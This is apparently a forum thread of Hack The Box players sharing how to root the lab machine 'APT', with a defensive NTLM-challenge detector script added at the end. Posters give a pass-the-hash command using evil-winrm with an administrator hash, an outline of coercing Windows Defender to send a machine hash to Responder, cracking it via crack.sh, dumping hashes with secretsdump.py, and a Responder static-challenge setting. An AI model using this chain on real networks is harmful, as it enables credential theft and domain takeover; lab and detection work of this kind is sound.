FLAG APT Commands to root ( get both user and root flags )
by vegetakasapa - January 16, 2021 at 11:00 AM
#1
1) add "dead:beef::b885:d62a:d679:573f apt.htb" to /etc/hosts
2) run "sudo gem install evil-winrm" 
3) finally execute "evil-winrm -i apt.htb -u administrator -H c370bddf384a691d811ff3495e8a72e2"


bhoom u will get the admin shell :) 

if u feel helpful please donate
Reply
#2
(January 16, 2021 at 11:00 AM)vegetakasapa Wrote: 1) add "dead:beef::b885:d62a:d679:573f apt.htb" to /etc/hosts
2) run "sudo gem install evil-winrm" 
3) finally execute "evil-winrm -i apt.htb -u administrator -H c370bddf384a691d811ff3495e8a72e2"


bhoom u will get the admin shell :) 


How did you get the administrator hash?
Reply
#3
It's a long process but.
1) u have to leak the hash of machine user(APT$) using responder and WindowsDefender
2) crack the hash using crack.sh
3) use secretsdump.py to dump other hashes using that machine user hash
4) u will get this hash.
Reply
#4
Thanks! Would donate, but don't have enough to do :(

Btw how did you get defender to try to authenticate to your machine? running MpCmdRun.exe was denied.
Reply
#5
Got the command working and see the smb traffic on my box, but for some reason responder isn't giving me any hashes and can't seem to figure out what is wrong
Reply
#6
(January 18, 2021 at 04:43 PM)jarvis4321 Wrote: Got the command working and see the smb traffic on my box, but for some reason responder isn't giving me any hashes and can't seem to figure out what is wrong
Just in case someone is wondering, for some reason scantype needs to be set correctly for the hash to be sent as well as the setting in responder
Reply
#7
(January 18, 2021 at 02:25 PM)lingling40hrs Wrote: It's a long process but.
1) u have to leak the hash of machine user(APT$) using responder and WindowsDefender
2) crack the hash using crack.sh
3) use secretsdump.py to dump other hashes using that machine user hash
4) u will get this hash.

Is there a way that you can crack the hash without having to pay for it at crack.sh?
Reply
#8
(January 21, 2021 at 09:47 AM)parapride Wrote:
(January 18, 2021 at 02:25 PM)lingling40hrs Wrote: It's a long process but.
1) u have to leak the hash of machine user(APT$) using responder and WindowsDefender
2) crack the hash using crack.sh
3) use secretsdump.py to dump other hashes using that machine user hash
4) u will get this hash.

Is there a way that you can crack the hash without having to pay for it at crack.sh?

Hi there! I was afraid of the same thing, but crack.sh will crack the NTLMv1 for free...you just need to enter it in per their instructions, enter your email, and it will be sent to you. For me, I received their completed email in around 5-10 minutes after submission.
Reply
#10
(January 21, 2021 at 09:47 AM)parapride Wrote:
(January 18, 2021 at 02:25 PM)lingling40hrs Wrote: It's a long process but.
1) u have to leak the hash of machine user(APT$) using responder and WindowsDefender
2) crack the hash using crack.sh
3) use secretsdump.py to dump other hashes using that machine user hash
4) u will get this hash.

Is there a way that you can crack the hash without having to pay for it at crack.sh?

You need to set your "Challenge" in responder to the magic value for it to be free.

### Setup
So, you may or may not have already done this. In your responder conf, for the cracks to be "free", you need to set your challenge id to the magic value. This is in `/etc/responder/Responder.conf`.

Set it as:
```
; Custom challenge
Challenge = 1122334455667788

```
Reply
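
Seen from the defending side, the fixed challenge discussed in this thread is a network indicator: a legitimate server picks a random 8-byte challenge for every NTLM handshake. The following is an added example (not code from any poster or from Responder) that pulls the server challenge and negotiate flags out of an NTLMSSP CHALLENGE (type 2) message and flags the static value; the function names and the sample messages are constructed for illustration, the field offsets follow MS-NLMP, and the ESS check is a heuristic.

```python
import struct

# Static challenge from the Responder.conf setting quoted in the thread.
STATIC_CHALLENGE = bytes.fromhex("1122334455667788")
NTLMSSP_SIG = b"NTLMSSP\x00"
FLAG_ESS = 0x00080000  # NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY (MS-NLMP)


def parse_challenge(blob: bytes):
    """Return (flags, server_challenge) from the first NTLMSSP CHALLENGE
    (type 2) message found anywhere in blob, or None if there is none."""
    start = blob.find(NTLMSSP_SIG)
    while start != -1:
        # Header: signature(8) type(4) target-name fields(8) flags(4) challenge(8)
        if len(blob) - start >= 32:
            (msg_type,) = struct.unpack_from("<I", blob, start + 8)
            if msg_type == 2:
                (flags,) = struct.unpack_from("<I", blob, start + 20)
                return flags, blob[start + 24:start + 32]
        start = blob.find(NTLMSSP_SIG, start + 1)
    return None


def assess(blob: bytes):
    """List reasons a server's CHALLENGE message looks like hash-capture tooling."""
    parsed = parse_challenge(blob)
    if parsed is None:
        return []
    flags, challenge = parsed
    findings = []
    if challenge == STATIC_CHALLENGE:
        findings.append("static challenge 1122334455667788")
    if not flags & FLAG_ESS:
        # Without ESS an NTLMv1 response depends only on the server challenge.
        findings.append("ESS not negotiated: plain NTLMv1 response possible")
    return findings


def build_challenge(challenge: bytes, flags: int) -> bytes:
    """Constructed sample: minimal type 2 message with empty target name/info."""
    return (NTLMSSP_SIG + struct.pack("<I", 2) + struct.pack("<HHI", 0, 0, 56)
            + struct.pack("<I", flags) + challenge + bytes(8)
            + struct.pack("<HHI", 0, 0, 56) + bytes(8))


if __name__ == "__main__":
    rogue = b"\xffSMB-wrapper" + build_challenge(STATIC_CHALLENGE, 0x00000201)
    normal = build_challenge(bytes.fromhex("a3f19c04d27b5e68"), 0x00080201)
    print(assess(rogue))
    print(assess(normal))
```

Feed `assess` the payload bytes of SMB or HTTP responses taken from a packet capture; any hit on the static challenge from a host that is not a known server is worth investigating.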
